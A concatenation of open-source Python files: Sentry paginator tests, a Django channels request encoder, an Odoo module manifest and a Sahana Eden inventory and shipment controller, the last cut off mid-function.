def test_max_offset(self):
self.create_user("foo@example.com")
self.create_user("bar@example.com")
self.create_user("baz@example.com")
queryset = User.objects.all()
paginator = OffsetPaginator(queryset, max_offset=10)
result1 = paginator.get_result(cursor=None)
assert len(result1) == 3, result1
paginator = OffsetPaginator(queryset, max_offset=0)
with self.assertRaises(BadPaginationError):
paginator.get_result()
class DateTimePaginatorTest(TestCase):
def test_ascending(self):
joined = timezone.now()
# The DateTime pager only has accuracy up to 1000th of a second.
# Everythng can't be added within less than 10 microseconds of each
# other. This is handled by the pager (see test_rounding_offset), but
# this case shouldn't rely on it.
res1 = self.create_user("foo@example.com", date_joined=joined)
res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(seconds=1))
res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(seconds=2))
res4 = self.create_user("qux@example.com", date_joined=joined + timedelta(seconds=3))
queryset = User.objects.all()
paginator = DateTimePaginator(queryset, "date_joined")
result1 = paginator.get_result(limit=2, cursor=None)
assert len(result1) == 2, result1
assert result1[0] == res1
assert result1[1] == res2
assert result1.next
assert not result1.prev
result2 = paginator.get_result(limit=2, cursor=result1.next)
assert len(result2) == 2, result2
assert result2[0] == res3
assert result2[1] == res4
assert not result2.next
assert result2.prev
result3 = paginator.get_result(limit=1, cursor=result2.prev)
assert len(result3) == 1, result3
assert result3[0] == res2
assert result3.next
assert result3.prev
result4 = paginator.get_result(limit=1, cursor=result3.prev)
assert len(result4) == 1, result4
assert result4[0] == res1
assert result4.next
assert not result4.prev
def test_descending(self):
joined = timezone.now()
res1 = self.create_user("foo@example.com", date_joined=joined)
res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(seconds=1))
res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(seconds=2))
queryset = User.objects.all()
paginator = DateTimePaginator(queryset, "-date_joined")
result1 = paginator.get_result(limit=1, cursor=None)
assert len(result1) == 1, result1
assert result1[0] == res3
assert result1.next
assert not result1.prev
result2 = paginator.get_result(limit=2, cursor=result1.next)
assert len(result2) == 2, result2
assert result2[0] == res2
assert result2[1] == res1
assert not result2.next
assert result2.prev
result3 = paginator.get_result(limit=2, cursor=result2.prev)
assert len(result3) == 1, result3
assert result3[0] == res3
assert result3.next
assert not result3.prev
def test_prev_descending_with_new(self):
joined = timezone.now()
res1 = self.create_user("foo@example.com", date_joined=joined)
res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(seconds=1))
queryset = User.objects.all()
paginator = DateTimePaginator(queryset, "-date_joined")
result1 = paginator.get_result(limit=10, cursor=None)
assert len(result1) == 2, result1
assert result1[0] == res2
assert result1[1] == res1
res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(seconds=2))
res4 = self.create_user("qux@example.com", date_joined=joined + timedelta(seconds=3))
result2 = paginator.get_result(limit=10, cursor=result1.prev)
assert len(result2) == 2, result2
assert result2[0] == res4
assert result2[1] == res3
result3 = paginator.get_result(limit=10, cursor=result2.prev)
assert len(result3) == 0, result3
result4 = paginator.get_result(limit=10, cursor=result1.next)
assert len(result4) == 0, result4
def test_rounding_offset(self):
joined = timezone.now()
res1 = self.create_user("foo@example.com", date_joined=joined)
res2 = self.create_user("bar@example.com", date_joined=joined + timedelta(microseconds=1))
res3 = self.create_user("baz@example.com", date_joined=joined + timedelta(microseconds=2))
res4 = self.create_user("qux@example.com", date_joined=joined + timedelta(microseconds=3))
queryset = User.objects.all()
paginator = DateTimePaginator(queryset, "date_joined")
result1 = paginator.get_result(limit=3, cursor=None)
assert len(result1) == 3, result1
assert result1[0] == res1
assert result1[1] == res2
assert result1[2] == res3
result2 = paginator.get_result(limit=10, cursor=result1.next)
assert len(result2) == 1, result2
assert result2[0] == res4
result3 = paginator.get_result(limit=2, cursor=result2.prev)
assert len(result3) == 2, result3
assert result3[0] == res2
assert result3[1] == res3
result4 = paginator.get_result(limit=1, cursor=result3.prev)
assert len(result4) == 1, result4
assert result4[0] == res1
result5 = paginator.get_result(limit=10, cursor=result4.prev)
assert len(result5) == 0, list(result5)
def test_same_row_updated(self):
joined = timezone.now()
res1 = self.create_user("foo@example.com", date_joined=joined)
queryset = User.objects.all()
paginator = DateTimePaginator(queryset, "-date_joined")
result1 = paginator.get_result(limit=3, cursor=None)
assert len(result1) == 1, result1
assert result1[0] == res1
# Prev page should return no results
result2 = paginator.get_result(limit=3, cursor=result1.prev)
assert len(result2) == 0, result2
# If the same row has an updated join date then it should
# show up on the prev page
res1.update(date_joined=joined + timedelta(seconds=1))
result3 = paginator.get_result(limit=3, cursor=result1.prev)
assert len(result3) == 1, result3
assert result3[0] == res1
# Make sure updates work as expected with extra rows
res1.update(date_joined=res1.date_joined + timedelta(seconds=1))
res2 = self.create_user(
"bar@example.com", date_joined=res1.date_joined + timedelta(seconds=1)
)
res3 = self.create_user(
"baz@example.com", date_joined=res1.date_joined + timedelta(seconds=2)
)
res4 = self.create_user(
"bat@example.com", date_joined=res1.date_joined + timedelta(seconds=3)
)
result4 = paginator.get_result(limit=1, cursor=result3.prev)
assert len(result4) == 1, result4
assert result4[0] == res1
result5 = paginator.get_result(limit=3, cursor=result3.prev)
assert len(result5) == 3, result5
assert result5[0] == res3
assert result5[1] == res2
assert result5[2] == res1
result6 = paginator.get_result(limit=3, cursor=result5.prev)
assert len(result6) == 1, result6
assert result6[0] == res4
res4.update(date_joined=res4.date_joined + timedelta(seconds=1))
result7 = paginator.get_result(limit=3, cursor=result6.prev)
assert len(result7) == 1, result7
assert result7[0] == res4
def test_reverse_bisect_left():
assert reverse_bisect_left([], 0) == 0
assert reverse_bisect_left([1], -1) == 1
assert reverse_bisect_left([1], 0) == 1
assert reverse_bisect_left([1], 1) == 0
assert reverse_bisect_left([1], 2) == 0
assert reverse_bisect_left([2, 1], -1) == 2
assert reverse_bisect_left([2, 1], 0) == 2
assert reverse_bisect_left([2, 1], 1) == 1
assert reverse_bisect_left([2, 1], 2) == 0
assert reverse_bisect_left([2, 1], 3) == 0
assert reverse_bisect_left([3, 2, 1], -1) == 3
assert reverse_bisect_left([3, 2, 1], 0) == 3
assert reverse_bisect_left([3, 2, 1], 1) == 2
assert reverse_bisect_left([3, 2, 1], 2) == 1
assert reverse_bisect_left([3, 2, 1], 3) == 0
assert reverse_bisect_left([3, 2, 1], 4) == 0
assert reverse_bisect_left([4, 3, 2, 1], -1) == 4
assert reverse_bisect_left([4, 3, 2, 1], 0) == 4
assert reverse_bisect_left([4, 3, 2, 1], 1) == 3
assert reverse_bisect_left([4, 3, 2, 1], 2) == 2
assert reverse_bisect_left([4, 3, 2, 1], 3) == 1
assert reverse_bisect_left([4, 3, 2, 1], 4) == 0
assert reverse_bisect_left([4, 3, 2, 1], 5) == 0
assert reverse_bisect_left([1, 1], 0) == 2
assert reverse_bisect_left([1, 1], 1) == 0
assert reverse_bisect_left([1, 1], 2) == 0
assert reverse_bisect_left([2, 1, 1], 0) == 3
assert reverse_bisect_left([2, 1, 1], 1) == 1
assert reverse_bisect_left([2, 1, 1], 2) == 0
assert reverse_bisect_left([2, 2, 1], 0) == 3
assert reverse_bisect_left([2, 2, 1], 1) == 2
assert reverse_bisect_left([2, 2, 1], 2) == 0
assert reverse_bisect_left([3, 2, 1], 2, hi=10) == 1
class SequencePaginatorTestCase(SimpleTestCase):
def test_empty_results(self):
paginator = SequencePaginator([])
result = paginator.get_result(5)
assert list(result) == []
assert result.prev == Cursor(0, 0, True, False)
assert result.next == Cursor(0, 0, False, False)
paginator = SequencePaginator([], reverse=True)
result = paginator.get_result(5)
assert list(result) == []
assert result.prev == Cursor(0, 0, True, False)
assert result.next == Cursor(0, 0, False, False)
def test_ascending_simple(self):
paginator = SequencePaginator([(i, i) for i in range(10)], reverse=False)
result = paginator.get_result(5)
assert list(result) == [0, 1, 2, 3, 4]
assert result.prev == Cursor(0, 0, True, False)
assert result.next == Cursor(5, 0, False, True)
result = paginator.get_result(5, result.next)
assert list(result) == [5, 6, 7, 8, 9]
assert result.prev == Cursor(5, 0, True, True)
assert result.next == Cursor(9, 1, False, False)
result = paginator.get_result(5, result.prev)
assert list(result) == [0, 1, 2, 3, 4]
assert result.prev == Cursor(0, 0, True, False)
assert result.next == Cursor(5, 0, False, True)
result = paginator.get_result(5, Cursor(100, 0, False))
assert list(result) == []
assert result.prev == Cursor(9, 1, True, True)
assert result.next == Cursor(9, 1, False, False)
def test_descending_simple(self):
paginator = SequencePaginator([(i, i) for i in range(10)], reverse=True)
result = paginator.get_result(5)
assert list(result) == [9, 8, 7, 6, 5]
assert result.prev == Cursor(9, 0, True, False)
assert result.next == Cursor(4, 0, False, True)
result = paginator.get_result(5, result.next)
assert list(result) == [4, 3, 2, 1, 0]
assert result.prev == Cursor(4, 0, True, True)
assert result.next == Cursor(0, 1, False, False)
result = paginator.get_result(5, result.prev)
assert list(result) == [9, 8, 7, 6, 5]
assert result.prev == Cursor(9, 0, True, False)
assert result.next == Cursor(4, 0, False, True)
result = paginator.get_result(5, Cursor(-10, 0, False))
assert list(result) == []
assert result.prev == Cursor(0, 1, True, True)
assert result.next == Cursor(0, 1, False, False)
def test_ascending_repeated_scores(self):
paginator = SequencePaginator([(1, i) for i in range(10)], reverse=False)
result = paginator.get_result(5)
assert list(result) == [0, 1, 2, 3, 4]
assert result.prev == Cursor(1, 0, True, False)
assert result.next == Cursor(1, 5, False, True)
result = paginator.get_result(5, result.next)
assert list(result) == [5, 6, 7, 8, 9]
assert result.prev == Cursor(1, 5, True, True)
assert result.next == Cursor(1, 10, False, False)
result = paginator.get_result(5, result.prev)
assert list(result) == [0, 1, 2, 3, 4]
assert result.prev == Cursor(1, 0, True, False)
assert result.next == Cursor(1, 5, False, True)
result = paginator.get_result(5, Cursor(100, 0, False))
assert list(result) == []
assert result.prev == Cursor(1, 10, True, True)
assert result.next == Cursor(1, 10, False, False)
def test_descending_repeated_scores(self):
paginator = SequencePaginator([(1, i) for i in range(10)], reverse=True)
result = paginator.get_result(5)
assert list(result) == [9, 8, 7, 6, 5]
assert result.prev == Cursor(1, 0, True, False)
assert result.next == Cursor(1, 5, False, True)
result = paginator.get_result(5, result.next)
assert list(result) == [4, 3, 2, 1, 0]
assert result.prev == Cursor(1, 5, True, True)
assert result.next == Cursor(1, 10, False, False)
result = paginator.get_result(5, result.prev)
assert list(result) == [9, 8, 7, 6, 5]
assert result.prev == Cursor(1, 0, True, False)
assert result.next == Cursor(1, 5, False, True)
result = paginator.get_result(5, Cursor(-10, 0, False))
assert list(result) == []
assert result.prev == Cursor(1, 10, True, True)
assert result.next == Cursor(1, 10, False, False)
def test_hits(self):
n = 10
paginator = SequencePaginator([(i, i) for i in range(n)])
assert paginator.get_result(5, count_hits=True).hits == n
class GenericOffsetPaginatorTest(TestCase):
def test_simple(self):
def data_fn(offset=None, limit=None):
return [i for i in range(offset, limit)]
paginator = GenericOffsetPaginator(data_fn=data_fn)
result = paginator.get_result(5)
assert list(result) == [0, 1, 2, 3, 4]
assert result.prev == Cursor(0, 0, True, False)
assert result.next == Cursor(0, 5, False, True)
result2 = paginator.get_result(5, result.next)
assert list(result2) == [5]
assert result2.prev == Cursor(0, 0, True, True)
assert result2.next == Cursor(0, 10, False, False)
| mvaled/sentry | tests/sentry/api/test_paginator.py | Python | bsd-3-clause | 19,392 |
from django.http import HttpRequest
from django.utils.datastructures import MultiValueDict
from django.http.request import QueryDict
from django.conf import settings
def encode_request(request):
"""
Encodes a request to JSON-compatible datastructures
"""
# TODO: More stuff
value = {
"get": dict(request.GET.lists()),
"post": dict(request.POST.lists()),
"cookies": request.COOKIES,
"meta": {k: v for k, v in request.META.items() if not k.startswith("wsgi")},
"path": request.path,
"path_info": request.path_info,
"method": request.method,
"reply_channel": request.reply_channel,
}
return value
def decode_request(value):
"""
Decodes a request JSONish value to a HttpRequest object.
"""
request = HttpRequest()
request.GET = CustomQueryDict(value['get'])
request.POST = CustomQueryDict(value['post'])
request.COOKIES = value['cookies']
request.META = value['meta']
request.path = value['path']
request.method = value['method']
request.path_info = value['path_info']
request.reply_channel = value['reply_channel']
return request
class CustomQueryDict(QueryDict):
"""
Custom override of QueryDict that sets things directly.
"""
def __init__(self, values):
MultiValueDict.__init__(self, values)
| octaflop/channels | channels/request.py | Python | bsd-3-clause | 1,366 |
# -*- encoding: utf-8 -*-
##############################################################################
#
# ______ Releasing children from poverty _
# / ____/___ ____ ___ ____ ____ ___________(_)___ ____
# / / / __ \/ __ `__ \/ __ \/ __ `/ ___/ ___/ / __ \/ __ \
# / /___/ /_/ / / / / / / /_/ / /_/ (__ |__ ) / /_/ / / / /
# \____/\____/_/ /_/ /_/ .___/\__,_/____/____/_/\____/_/ /_/
# /_/
# in Jesus' name
#
# Copyright (C) 2014 Compassion CH (http://www.compassion.ch)
# @author: Cyril Sester, Emanuel Cino
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'LSV-DD Compassion',
'summary': 'Customize LSV-DD to fit Compassion needs',
'version': '1.0',
'license': 'AGPL-3',
'author': 'Compassion CH',
'website': 'http://www.compassion.ch',
'category': 'Other',
'depends': ['l10n_ch_lsv_dd',
'account_banking_payment_export',
'contract_compassion'],
'external_dependencies': {},
'data': [
'view/payment_mode.xml',
'data/payment_workflow.xml',
],
'demo': [],
'active': False,
'installable': True,
}
| ndtran/compassion-switzerland | lsv_compassion/__openerp__.py | Python | agpl-3.0 | 1,970 |
# -*- coding: utf-8 -*-
# -*- coding: utf-8 -*-
"""
Inventory Management
A module to record inventories of items at a locations (sites),
including Warehouses, Offices, Shelters & Hospitals
"""
module = request.controller
resourcename = request.function
if not settings.has_module(module):
raise HTTP(404, body="Module disabled: %s" % module)
# -----------------------------------------------------------------------------
def index():
"""
Application Home page
- custom View
"""
# Need CRUD String
table = s3db.table("cr_shelter", None)
module_name = settings.modules[module].name_nice
response.title = module_name
return dict(module_name=module_name)
# -----------------------------------------------------------------------------
def warehouse():
"""
RESTful CRUD controller
"""
if "viewing" in request.get_vars:
viewing = request.get_vars.viewing
tn, id = viewing.split(".", 1)
if tn == "inv_warehousec":
request.args.insert(0, id)
# CRUD pre-process
def prep(r):
if r.id:
r.table.obsolete.readable = r.table.obsolete.writable = True
if r.component:
if r.component.name == "inv_item":
# Filter out items which are already in this inventory
s3db.inv_prep(r)
# Remove the Warehouse Name from the list_fields
list_fields = s3db.get_config("inv_inv_item", "list_fields")
try:
list_fields.remove("site_id")
s3db.configure("inv_inv_item", list_fields=list_fields)
except:
pass
elif r.component.name == "recv" or \
r.component.name == "send":
# Filter out items which are already in this inventory
s3db.inv_prep(r)
elif r.component.name == "human_resource":
# Filter out people which are already staff for this warehouse
s3base.s3_filter_staff(r)
# Cascade the organisation_id from the hospital to the staff
htable = s3db.hrm_human_resource
htable.organisation_id.default = r.record.organisation_id
htable.organisation_id.writable = False
elif r.component.name == "req":
s3db.req_prep(r)
if r.method != "update" and r.method != "read":
# Hide fields which don't make sense in a Create form
# inc list_create (list_fields over-rides)
s3db.req_create_form_mods()
# "show_obsolete" var option can be added (btn?) later to
# disable this filter
if r.method in [None, "list"] and \
not r.vars.get("show_obsolete", False):
r.resource.add_filter(s3db.inv_warehouse.obsolete != True)
return True
s3.prep = prep
# CRUD post-process
def postp(r, output):
if r.interactive and not r.component and r.method != "import":
# Change Action buttons to open Stock Tab by default
read_url = URL(f="warehouse", args=["[id]", "inv_item"])
update_url = URL(f="warehouse", args=["[id]", "inv_item"])
s3mgr.crud.action_buttons(r,
read_url=read_url,
update_url=update_url)
if "add_btn" in output:
del output["add_btn"]
return output
s3.postp = postp
if "extra_data" in request.get_vars:
resourcename = "inv_item"
else:
resourcename = "warehouse"
csv_stylesheet = "%s.xsl" % resourcename
output = s3_rest_controller(module, resourcename,
rheader=s3db.inv_warehouse_rheader,
csv_template = resourcename,
csv_stylesheet = csv_stylesheet,
# Extra fields for CSV uploads:
csv_extra_fields = [
dict(label="Organisation",
field=s3db.org_organisation_id(comment=None))
])
if "add_btn" in output:
del output["add_btn"]
return output
# -----------------------------------------------------------------------------
def supplier():
current.request.get_vars["organisation.organisation_type_id$name"] = "Supplier"
return s3db.org_organisation_controller()
# =============================================================================
def inv_item():
""" REST Controller """
tablename = "inv_inv_item"
# Load model to be able to override CRUD string(s)
table = s3db[tablename]
s3.crud_strings[tablename].msg_list_empty = T("No Stock currently registered")
if "report" in request.get_vars and \
request.get_vars.report == "mon":
s3.crud_strings[tablename].update(dict(
title_list = T("Monetization Report"),
subtitle_list = T("Monetization Details"),
msg_list_empty = T("No Stock currently registered"),
title_search = T("Monetization Report"),
))
s3db.configure(tablename,
list_fields = ["id",
(T("Donor"), "supply_org_id"),
(T("Items/Description"), "item_id"),
(T("Quantity"), "quantity"),
(T("Unit"), "item_pack_id"),
(T("Unit Value"), "pack_value"),
(T("Total Value"), "total_value"),
(T("Remarks"), "comments"),
"status",
]
)
else:
s3db.configure(tablename,
insertable=False,
list_fields = ["id",
"site_id",
"item_id",
(T("Item Code"), "item_code"),
(T("Category"), "item_category"),
"quantity",
"pack_value",
#(T("Total Value"), "total_value"),
]
)
# Upload for configuration (add replace option)
s3.importerPrep = lambda: dict(ReplaceOption=T("Remove existing data before import"))
# if this url has a viewing track items then redirect to track_movement
if "viewing" in request.get_vars:
viewing = request.get_vars.viewing
tn, id = viewing.split(".", 1)
if tn == "inv_track_item":
record = s3db.inv_track_item[id]
redirect(URL(c = "inv",
f = "track_movement",
args = [],
vars = {"viewing" : "%s.%s" % ("inv_inv_item", record.item_id)}
)
)
def prep(r):
if r.method != "search" and r.method != "report":
s3.dataTable_group = 1
return True
s3.prep = prep
# Import pre-process
def import_prep(data):
"""
Deletes all Stock records of the organisation
before processing a new data import, used for the import_prep
hook in s3mgr
"""
request = current.request
resource, tree = data
xml = current.xml
tag = xml.TAG
att = xml.ATTRIBUTE
if s3.importerReplace:
if tree is not None:
root = tree.getroot()
expr = "/%s/%s[@%s='org_organisation']/%s[@%s='name']" % \
(tag.root, tag.resource, att.name, tag.data, att.field)
orgs = root.xpath(expr)
otable = s3db.org_organisation
stable = s3db.org_site
itable = s3db.inv_inv_item
for org in orgs:
org_name = org.get("value", None) or org.text
if org_name:
try:
org_name = json.loads(xml.xml_decode(org_name))
except:
pass
if org_name:
query = (otable.name == org_name) & \
(stable.organisation_id == otable.id) & \
(itable.site_id == stable.id)
resource = s3mgr.define_resource("inv", "inv_item", filter=query)
ondelete = s3db.get_config("inv_inv_item", "ondelete")
resource.delete(ondelete=ondelete, format="xml")
resource.skip_import = True
s3mgr.import_prep = import_prep
# Limit site_id to sites the user has permissions for
auth.permitted_facilities(table=table,
error_msg=T("You do not have permission for any site to add an inventory item."))
if len(request.args) > 1 and request.args[1] == "track_item":
# remove CRUD generated buttons in the tabs
s3db.configure("inv_track_item",
create=False,
listadd=False,
editable=False,
deletable=False,
)
output = s3_rest_controller(rheader=s3db.inv_warehouse_rheader,
csv_extra_fields = [
dict(label="Organisation",
field=s3db.org_organisation_id(comment=None)
)
],
pdf_paper_alignment = "Landscape",
pdf_table_autogrow = "B",
pdf_groupby = "site_id, item_id",
pdf_orderby = "expiry_date, supply_org_id",
)
if "add_btn" in output:
del output["add_btn"]
return output
# -----------------------------------------------------------------------------
def track_movement():
""" REST Controller """
table = s3db.inv_track_item
s3db.configure("inv_track_item",
create=False,
listadd=False,
editable=False,
deletable=False,
)
def prep(r):
if r.interactive:
if "viewing" in request.vars:
dummy, item_id = request.vars.viewing.split(".")
filter = (table.send_inv_item_id == item_id ) | \
(table.recv_inv_item_id == item_id)
s3.filter = filter
return True
s3.prep = prep
output = s3_rest_controller("inv", "track_item",
rheader=s3db.inv_warehouse_rheader,
)
if "add_btn" in output:
del output["add_btn"]
return output
# -----------------------------------------------------------------------------
def inv_item_quantity():
"""
"""
table = s3db.inv_inv_item
ptable = s3db.supply_item_pack
query = (table.id == request.args[0]) & \
(table.item_pack_id == ptable.id)
record = db(query).select(table.quantity,
ptable.quantity,
limitby=(0, 1)).first()
response.headers["Content-Type"] = "application/json"
return json.dumps(record)
# -----------------------------------------------------------------------------
def inv_item_packs():
"""
Called by S3FilterFieldChange to provide the pack options for a
particular Item
"""
table = s3db.inv_inv_item
ptable = s3db.supply_item_pack
query = (table.id == request.args[0]) & \
(table.item_id == ptable.item_id)
records = db(query).select(ptable.id,
ptable.name,
ptable.quantity)
response.headers["Content-Type"] = "application/json"
return records.json()
# =============================================================================
def send():
""" RESTful CRUD controller """
sendtable = s3db.inv_send
tracktable = s3db.inv_track_item
# Limit site_id to sites the user has permissions for
error_msg = T("You do not have permission for any facility to send a shipment.")
auth.permitted_facilities(table=sendtable, error_msg=error_msg)
# Set Validator for checking against the number of items in the warehouse
vars = request.vars
if (vars.send_inv_item_id):
if not vars.item_pack_id:
vars.item_pack_id = s3db.inv_inv_item[vars.send_inv_item_id].item_pack_id
s3db.inv_track_item.quantity.requires = QUANTITY_INV_ITEM(db,
vars.send_inv_item_id,
vars.item_pack_id)
SHIP_STATUS_IN_PROCESS = s3db.inv_ship_status["IN_PROCESS"]
SHIP_STATUS_SENT = s3db.inv_ship_status["SENT"]
SHIP_STATUS_RECEIVED = s3db.inv_ship_status["RECEIVED"]
SHIP_STATUS_CANCEL = s3db.inv_ship_status["CANCEL"]
SHIP_STATUS_RETURNING = s3db.inv_ship_status["RETURNING"]
def set_send_attr(status):
sendtable.send_ref.writable = False
if status == SHIP_STATUS_IN_PROCESS:
sendtable.send_ref.readable = False
else:
# Make all fields writable False
for field in sendtable.fields:
sendtable[field].writable = False
TRACK_STATUS_UNKNOWN = s3db.inv_tracking_status["UNKNOWN"]
TRACK_STATUS_PREPARING = s3db.inv_tracking_status["IN_PROCESS"]
TRACK_STATUS_TRANSIT = s3db.inv_tracking_status["SENT"]
TRACK_STATUS_UNLOADING = s3db.inv_tracking_status["UNLOADING"]
TRACK_STATUS_ARRIVED = s3db.inv_tracking_status["RECEIVED"]
TRACK_STATUS_CANCELED = s3db.inv_tracking_status["CANCEL"]
TRACK_STATUS_RETURNING = s3db.inv_tracking_status["RETURNING"]
def set_track_attr(status):
# By default Make all fields writable False
for field in tracktable.fields:
tracktable[field].writable = False
# Hide some fields
tracktable.send_id.readable = False
tracktable.recv_id.readable = False
tracktable.bin.readable = False
tracktable.item_id.readable = False
tracktable.recv_quantity.readable = False
tracktable.return_quantity.readable = False
tracktable.expiry_date.readable = False
tracktable.owner_org_id.readable = False
tracktable.supply_org_id.readable = False
tracktable.adj_item_id.readable = False
if status == TRACK_STATUS_PREPARING:
# show some fields
tracktable.send_inv_item_id.writable = True
tracktable.item_pack_id.writable = True
tracktable.quantity.writable = True
tracktable.comments.writable = True
# hide some fields
tracktable.currency.readable = False
tracktable.pack_value.readable = False
tracktable.item_source_no.readable = False
tracktable.inv_item_status.readable = False
elif status == TRACK_STATUS_ARRIVED:
# Shipment arrived display some extra fields at the destination
tracktable.item_source_no.readable = True
tracktable.recv_quantity.readable = True
tracktable.return_quantity.readable = True
tracktable.recv_bin.readable = True
tracktable.currency.readable = True
tracktable.pack_value.readable = True
elif status == TRACK_STATUS_RETURNING:
tracktable.return_quantity.readable = True
tracktable.return_quantity.writable = True
tracktable.currency.readable = True
tracktable.pack_value.readable = True
def prep(r):
# Default to the Search tab in the location selector
s3.gis.tab = "search"
record = sendtable[r.id]
if record and record.status != SHIP_STATUS_IN_PROCESS:
# now that the shipment has been sent
# lock the record so that it can't be meddled with
s3db.configure("inv_send",
create=False,
listadd=False,
editable=False,
deletable=False,
)
if r.component:
if record.status == SHIP_STATUS_RECEIVED or \
record.status == SHIP_STATUS_CANCEL:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"bin",
"quantity",
"currency",
"pack_value",
"recv_quantity",
"return_quantity",
"owner_org_id",
"supply_org_id",
"inv_item_status",
"comments",
]
elif record.status == SHIP_STATUS_RETURNING:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"currency",
"pack_value",
"return_quantity",
"bin",
"owner_org_id",
"supply_org_id",
"inv_item_status",
]
else:
list_fields = ["id",
"status",
"item_id",
"item_pack_id",
"quantity",
"currency",
"pack_value",
"bin",
"owner_org_id",
"supply_org_id",
"inv_item_status",
]
s3db.configure("inv_track_item",
list_fields=list_fields,
)
# Can only create or delete track items for a send record if the status is preparing
if r.method == "create" or r.method == "delete":
if record.status != SHIP_STATUS_IN_PROCESS:
return False
if r.method == "delete":
return s3.inv_track_item_deleting(r.component_id)
if r.record.get("site_id"):
# Restrict to items from this warehouse only
tracktable.send_inv_item_id.requires = IS_ONE_OF(db,
"inv_inv_item.id",
s3db.inv_item_represent,
orderby="inv_inv_item.id",
sort=True,
filterby = "site_id",
filter_opts = [r.record.site_id]
)
# Hide the values that will be copied from the inv_inv_item record
if r.component_id:
track_record = tracktable[r.component_id]
set_track_attr(track_record.status)
# if the track record is linked to a request item then
# the stock item has already been selected so make it read only
if track_record and track_record.get("req_item_id"):
tracktable.send_inv_item_id.writable = False
tracktable.item_pack_id.writable = False
stock_qnty = track_record.send_inv_item_id.quantity
tracktable.quantity.comment = T("%d in stock" % stock_qnty)
tracktable.quantity.requires = QUANTITY_INV_ITEM(db,
track_record.send_inv_item_id,
track_record.item_pack_id)
# Hide the item id
tracktable.item_id.readable = False
else:
set_track_attr(TRACK_STATUS_PREPARING)
if r.interactive:
if r.record.status == SHIP_STATUS_IN_PROCESS:
s3.crud_strings.inv_send.title_update = \
s3.crud_strings.inv_send.title_display = T("Process Shipment to Send")
elif "site_id" in request.vars and r.record.status == SHIP_STATUS_SENT:
s3.crud_strings.inv_send.title_update = \
s3.crud_strings.inv_send.title_display = T("Review Incoming Shipment to Receive")
else:
if request.get_vars.received:
# Set the items to being received
sendtable[r.id] = dict(status = SHIP_STATUS_RECEIVED)
db(tracktable.send_id == r.id).update(status = TRACK_STATUS_ARRIVED)
response.message = T("Shipment received")
# else set the inv_send attributes
elif r.id:
record = sendtable[r.id]
set_send_attr(record.status)
else:
set_send_attr(SHIP_STATUS_IN_PROCESS)
sendtable.send_ref.readable = False
return True
if len(request.args) > 1 and request.args[1] == "track_item":
# Shouldn't fail but...
# if user enters the send id then it could so wrap in a try...
try:
status = sendtable[request.args[0]].status
except:
status = None
if status:
editable = False
if status == SHIP_STATUS_RETURNING:
editable = True
# remove CRUD generated buttons in the tabs
s3db.configure("inv_track_item",
create=False,
listadd=False,
editable=editable,
deletable=False,
)
s3.prep = prep
output = s3_rest_controller(rheader=s3.inv_send_rheader)
return output
# ==============================================================================
def send_commit():
"""
"""
# Get the commit record
try:
commit_id = request.args[0]
except:
redirect(URL(c="req",
f="commit"))
req_table = s3db.req_req
rim_table = s3db.req_req_item
com_table = s3db.req_commit
cim_table = s3db.req_commit_item
send_table = s3db.inv_send
track_table = s3db.inv_track_item
query = (com_table.id == commit_id) & \
(com_table.req_id == req_table.id) & \
(com_table.deleted == False)
record = db(query).select(limitby = (0, 1)).first()
# create a inv_send and link to the commit
send_id = send_table.insert(sender_id = record.req_commit.committer_id,
site_id = record.req_commit.site_id,
recipient_id = record.req_req.requester_id,
to_site_id = record.req_req.site_id,
status = 0)
# get all of the committed items
query = (cim_table.commit_id == commit_id) & \
(cim_table.req_item_id == rim_table.id) & \
(cim_table.deleted == False)
records = db(query).select()
# create inv_track_items for each commit item
for row in records:
id = track_table.insert(track_org_id = record.req_commit.organisation_id,
send_id = send_id,
status = 1,
item_id = row.req_req_item.item_id,
item_pack_id = row.req_req_item.item_pack_id,
quantity = row.req_commit_item.quantity,
currency = row.req_req_item.currency,
req_item_id = row.req_req_item.id
)
track_table(track_table.id == id).update(tracking_no = "TN:%6d" % (10000 + id))
# redirect to inv_send for the send id just created
redirect(URL(c = "inv",
f = "send",
args = [send_id, "track_item"]))
# -----------------------------------------------------------------------------
def send_process():
""" Send a Shipment """
try:
send_id = request.args[0]
except:
redirect(URL(c="inv",
f="send"))
stable = s3db.inv_send
tracktable = s3db.inv_track_item
siptable = s3db.supply_item_pack
rrtable = s3db.req_req
ritable = s3db.req_req_item
if not auth.s3_has_permission("update",
stable,
record_id=send_id):
session.error = T("You do not have permission to send this shipment.")
send_record = stable[send_id]
if send_record.status != eden.inv.inv_ship_status["IN_PROCESS"]:
session.error = T("This shipment has already been sent.")
# Get the track items that are part of this shipment
query = (tracktable.send_id == send_id ) & \
(tracktable.deleted == False)
track_items = db(query).select()
if not track_items:
session.error = T("No items have been selected for shipping.")
if session.error:
redirect(URL(c = "inv",
f = "send",
args = [send_id]))
# Update Send record & lock for editing
stable[send_id] = dict(date = request.utcnow,
status = eden.inv.inv_ship_status["SENT"],
owned_by_user = None,
owned_by_group = ADMIN)
# if this is linked to a request then update the quantity in transit
req_ref = send_record.req_ref
query = (rrtable.req_ref == req_ref)
req_rec = db(query).select(rrtable.id, limitby = (0, 1)).first()
if req_rec:
req_id = req_rec.id
for track_item in track_items:
if track_item.req_item_id:
req_i = ritable[track_item.req_item_id]
req_p_qnty = siptable[req_i.item_pack_id].quantity
t_qnty = track_item.quantity
t_pack_id = track_item.item_pack_id
inv_p_qnty = siptable[t_pack_id].quantity
transit_quantity = t_qnty * inv_p_qnty / req_p_qnty
db(ritable.id == track_item.req_item_id).update(quantity_transit = ritable.quantity_transit + transit_quantity)
s3db.req_update_status(req_id)
# Create a Receive record
rtable = s3db.inv_recv
